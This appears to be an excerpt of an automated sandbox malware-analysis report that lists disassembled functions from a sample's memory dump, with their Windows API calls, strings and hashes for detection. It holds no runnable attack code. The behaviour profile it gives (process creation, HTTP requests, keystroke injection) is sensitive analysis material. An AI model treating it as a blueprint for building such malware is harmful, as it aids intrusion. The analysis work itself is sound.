ListBox, xrefs: 00FE90BC

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 78ffcd13ec4f5b480f0b0c096bda63554e50e1ac84b985baee0520b7863c243a
Instruction ID: 26b3d98e236b1ea682a1c1338351373c0b4712d7b7b8e9414ecd0491b2a4f669
Opcode Fuzzy Hash: 78ffcd13ec4f5b480f0b0c096bda63554e50e1ac84b985baee0520b7863c243a
Instruction Fuzzy Hash: 3321C575A00249BBEF11ABB5CC85EFEBB74EF48310F10401AF951972A5DB7D9819EB20

Function 00FE9163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00FE916F
GetClassNameW.USER32(00000000,?,00000100), ref: 00FE9184
_wcscmp.LIBCMT ref: 00FE9196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00FE9211

Strings

list, xrefs: 00FE91F3
largeicons, xrefs: 00FE91A5
SHELLDLL_DefView, xrefs: 00FE9190
smallicons, xrefs: 00FE91D9
details, xrefs: 00FE91BF

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 23dde4f7b6bcdef3b7f9b15404952a2abf49b1473f7af0a607e4abcb9443539b
Instruction ID: ca9b8b35c7cbdcdfb4a131ff1baef725e98acdc623e09509a977603870a25b6f
Opcode Fuzzy Hash: 23dde4f7b6bcdef3b7f9b15404952a2abf49b1473f7af0a607e4abcb9443539b
Instruction Fuzzy Hash: A5110A7B64C387BAFE212527DC06DE7379C9B15730B200426FA00E4095FFAA9D517A64

Function 010088AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 010088D7
CoInitialize.OLE32(00000000), ref: 01008904
CoUninitialize.OLE32 ref: 0100890E
GetRunningObjectTable.OLE32(00000000,?), ref: 01008A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 01008B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,01022C0C), ref: 01008B6F
CoGetObject.OLE32(?,00000000,01022C0C,?), ref: 01008B92
SetErrorMode.KERNEL32(00000000), ref: 01008BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01008C25
VariantClear.OLEAUT32(?), ref: 01008C35

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 1b9257ffddbe9a671e866a616662a674c5624c1f28dc26d61679a6492bdece1b
Instruction ID: 1eb0bcdebec701b4bd18a4d792d37115b02f0c81e9d00088a5dbda56ee35519a
Opcode Fuzzy Hash: 1b9257ffddbe9a671e866a616662a674c5624c1f28dc26d61679a6492bdece1b
Instruction Fuzzy Hash: BAC148B16083059FE701EF68C88492BB7E9FF89348F00495DF9899B291DB75ED05CB52

Function 00FF7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00FF7A6C

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 15541723ca64c22e4f49548638bf722482b6304024b05f975ace10b7286fa5d1
Instruction ID: 0763365a82c64bfea936a21a1fcb3c93b24d8e04bc3608ffe20d0a7ae0921a97
Opcode Fuzzy Hash: 15541723ca64c22e4f49548638bf722482b6304024b05f975ace10b7286fa5d1
Instruction Fuzzy Hash: 0CB19F7190830E9FDB10EF94D884BBEF7B4EF49321F144029E651E72A1D778A941EB90

Function 00FF11CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00FF11F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00FF0268,?,00000001), ref: 00FF1204
GetWindowThreadProcessId.USER32(00000000), ref: 00FF120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FF0268,?,00000001), ref: 00FF121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00FF122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FF0268,?,00000001), ref: 00FF1245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FF0268,?,00000001), ref: 00FF1257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00FF0268,?,00000001), ref: 00FF129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00FF0268,?,00000001), ref: 00FF12B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00FF0268,?,00000001), ref: 00FF12BC

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 2ec54cc4af344b4b5d2d5eb813e796a4bf6ebdca25b5ac32cacb473c3c153190
Instruction ID: 8d441fb9567248d51bca217339d2fec8617616d9e959fbc1a49a659b8edaab68
Opcode Fuzzy Hash: 2ec54cc4af344b4b5d2d5eb813e796a4bf6ebdca25b5ac32cacb473c3c153190
Instruction Fuzzy Hash: D131AC75A00308EBDB30DFA4E888B7A37A9BF58331F504215FA45C61A5D77A9D44AB60

Function 00F9FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F9FAA6
OleUninitialize.OLE32(?,00000000), ref: 00F9FB45
UnregisterHotKey.USER32(?), ref: 00F9FC9C
DestroyWindow.USER32(?), ref: 00FD45D6
FreeLibrary.KERNEL32(?), ref: 00FD463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FD4668

Strings

close all, xrefs: 00F9FAA1

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 9dda68605da67cff568523bdddd94cc9cb0293f60d52df6c6574f906226567c9
Instruction ID: 72e14bb778486a20eff08f226b6b6f634ecaf4a16eb3db3f59d088f6fc0c69f3
Opcode Fuzzy Hash: 9dda68605da67cff568523bdddd94cc9cb0293f60d52df6c6574f906226567c9
Instruction Fuzzy Hash: 63A16C31B01212CFDB29EF14C995B69F365BF05710F5442ADE80AAB251DB34ED1AEF50

Function 00FEA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00FEA439), ref: 00FEA377

Strings

TEXT, xrefs: 00FEA2AE
REGEXPCLASS, xrefs: 00FEA13C
CLASSNN, xrefs: 00FEA119
INSTANCE, xrefs: 00FEA285
CLASS, xrefs: 00FEA0F6
NAME, xrefs: 00FEA1A9

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 6d466a1256f63c982fe0557be9c10433a0bb9119154755b6f98b1de136ae57ef
Instruction ID: aeb950982b39f0b20f42b55e14420cb03763fd3a8c63a408c5af5b2f3ac43bb2
Opcode Fuzzy Hash: 6d466a1256f63c982fe0557be9c10433a0bb9119154755b6f98b1de136ae57ef
Instruction Fuzzy Hash: 2791F631A00646AFDB18EFA1C881BEEFB74FF04310F548119E959A3141DF357999EBA1

Function 00F92E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00F92EAE

Part of subcall function 00F91DB3: GetClientRect.USER32(?,?), ref: 00F91DDC
Part of subcall function 00F91DB3: GetWindowRect.USER32(?,?), ref: 00F91E1D
Part of subcall function 00F91DB3: ScreenToClient.USER32(?,?), ref: 00F91E45

GetDC.USER32 ref: 00FCCD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00FCCD45
SelectObject.GDI32(00000000,00000000), ref: 00FCCD53
SelectObject.GDI32(00000000,00000000), ref: 00FCCD68
ReleaseDC.USER32(?,00000000), ref: 00FCCD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00FCCDFB

Strings

U, xrefs: 00FCCCD0

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 291b5a1decd251c84fadcb8e27bcaca8681cf55fa2ad682ba2e4daddd563eb22
Instruction ID: 89e04ed438552d6979e47e83fdee9790643d27e1085a98ae6a7a86135a9c8bf3
Opcode Fuzzy Hash: 291b5a1decd251c84fadcb8e27bcaca8681cf55fa2ad682ba2e4daddd563eb22
Instruction Fuzzy Hash: 4A71E431900206EFDF21DF64C981FAA7BB5FF49320F14426EED9A5A255D7358C41EBA0

Function 01001A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 01001A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 01001A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 01001ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 01001AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01001AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 01001B10
InternetCloseHandle.WININET(00000000), ref: 01001B57

Part of subcall function 01002483: GetLastError.KERNEL32(?,?,01001817,00000000,00000000,00000001), ref: 01002498
Part of subcall function 01002483: SetEvent.KERNEL32(?,?,01001817,00000000,00000000,00000001), ref: 010024AD

Strings

, xrefs: 01001B01

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: c5ffe565d4e478f97824eada3153ad0202d20ec5691f9f9976e648c1f4a8c154
Instruction ID: 4eef0267939989f042fda04ba3a159d518bd4f58c301ae9fe2c9e3c42381dfb7
Opcode Fuzzy Hash: c5ffe565d4e478f97824eada3153ad0202d20ec5691f9f9976e648c1f4a8c154
Instruction Fuzzy Hash: DA416DB1500619BFFB129F54CC89FFA7BACFF08354F004156FA859A181EBB5DA448BA0

Function 01008C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0101F910), ref: 01008D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0101F910), ref: 01008D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 01008ED6
SysFreeString.OLEAUT32(?), ref: 01008F00

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 2dfe0cc510389d4bab262fdaf53a0ec8da1d4d3fd23b7c390a76230ee749fc29
Instruction ID: 79c1dfda496a844a400352f512c5e9ba662e5b357b63b85e37cfd64967d0aa7d
Opcode Fuzzy Hash: 2dfe0cc510389d4bab262fdaf53a0ec8da1d4d3fd23b7c390a76230ee749fc29
Instruction Fuzzy Hash: 6BF17F71A00209EFEF15DF98C884EAEB7B9FF45314F108499F945AB291DB31AE45CB50

Function 0100F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0100F6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0100F848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0100F86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0100F8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0100F8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0100FA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0100FA7C
CloseHandle.KERNEL32(?), ref: 0100FAAB
CloseHandle.KERNEL32(?), ref: 0100FB22

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: f76ad5d95767f88b35d58f734cef7e9ecf72193b5826d8313407b2e73e7688d3
Instruction ID: c1de27cff8fc3f77f88a7370e156b4feb2e2404dc7d83b945adadb2718b19511
Opcode Fuzzy Hash: f76ad5d95767f88b35d58f734cef7e9ecf72193b5826d8313407b2e73e7688d3
Instruction Fuzzy Hash: 1DE1E4312043019FEB25EF29C881A6ABBE0FF85350F04855DF9C98B2A1CB35DD45EB52

Function 00FF4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00FF466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FF3697,?), ref: 00FF468B

Part of subcall function 00FF466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FF3697,?), ref: 00FF46A4

Part of subcall function 00FF4A31: GetFileAttributesW.KERNEL32(?,00FF370B), ref: 00FF4A32

lstrcmpiW.KERNEL32(?,?), ref: 00FF4D40
_wcscmp.LIBCMT ref: 00FF4D5A
MoveFileW.KERNEL32(?,?), ref: 00FF4D75

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 933a5c88060df45c138b440c36510fe1b8197e523363f524fe6e96659de2f13d
Instruction ID: 552ffba259fea6f9b382a7a4abf3087e71462a694e77ae9ce4c08ab8041d6c68
Opcode Fuzzy Hash: 933a5c88060df45c138b440c36510fe1b8197e523363f524fe6e96659de2f13d
Instruction Fuzzy Hash: 515155B24083499BD725DB64DC819EFB3ECAF84350F00091EB289D3151EE79B688DB66

Function 01018645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 010186FF

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: efc721d07ae5271be2e63c3b6443ca9c2e8219c59f3dbbb3cd52ef17068d2e98
Instruction ID: ad6ddd487a8113c9c082ff2270db7e466865288e517b6a270e7299fbdb99ed7b
Opcode Fuzzy Hash: efc721d07ae5271be2e63c3b6443ca9c2e8219c59f3dbbb3cd52ef17068d2e98
Instruction Fuzzy Hash: C151B430500205BEEF609B28DC84FAD3BA5BB09750F208553FAD0E61A9D77EE750CB50

Function 00F92B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00FCC2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FCC319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00FCC331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00FCC34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00FCC370
DestroyIcon.USER32(00000000), ref: 00FCC37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00FCC39C
DestroyIcon.USER32(?), ref: 00FCC3AB

Part of subcall function 0101A4AF: DeleteObject.GDI32(00000000), ref: 0101A4E8

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 6676219c3902c528be86339a11e9bb244b47f34e5eb0b0a1f1107cf72901973e
Instruction ID: 3ec7c350d8542252ad99b8023298fa42911e7cb1404f7beb4ce7943b254bd2d9
Opcode Fuzzy Hash: 6676219c3902c528be86339a11e9bb244b47f34e5eb0b0a1f1107cf72901973e
Instruction Fuzzy Hash: 1B514971A0020AAFEF24DF64DC45FAA7BE5FB58320F104518F946E7290DB75AD50EB90

Function 00FE966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FEA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FEA84C
Part of subcall function 00FEA82C: GetCurrentThreadId.KERNEL32 ref: 00FEA853
Part of subcall function 00FEA82C: AttachThreadInput.USER32(00000000,?,00FE9683,?,00000001), ref: 00FEA85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 00FE968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00FE96AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00FE96AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 00FE96B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00FE96D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00FE96D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 00FE96E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00FE96F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00FE96FB

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 6436cec2bd255ae4df252e385b8f9867b52962ef66b840c015bf0c2343b4ccb8
Instruction ID: ef6b6f006b4c18986f6f9b919df1bbd9a3c7e20a5941a428d5db47d9f314d3ba
Opcode Fuzzy Hash: 6436cec2bd255ae4df252e385b8f9867b52962ef66b840c015bf0c2343b4ccb8
Instruction Fuzzy Hash: 2F11CEB1910619BEF6206B719C89F6A3E2DEB4C794F100415F284AB094C9FB6C109BB4

Function 00FE8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00FE853C,00000B00,?,?), ref: 00FE892A
HeapAlloc.KERNEL32(00000000,?,00FE853C,00000B00,?,?), ref: 00FE8931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00FE853C,00000B00,?,?), ref: 00FE8946
GetCurrentProcess.KERNEL32(?,00000000,?,00FE853C,00000B00,?,?), ref: 00FE894E
DuplicateHandle.KERNEL32(00000000,?,00FE853C,00000B00,?,?), ref: 00FE8951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00FE853C,00000B00,?,?), ref: 00FE8961
GetCurrentProcess.KERNEL32(00FE853C,00000000,?,00FE853C,00000B00,?,?), ref: 00FE8969
DuplicateHandle.KERNEL32(00000000,?,00FE853C,00000B00,?,?), ref: 00FE896C
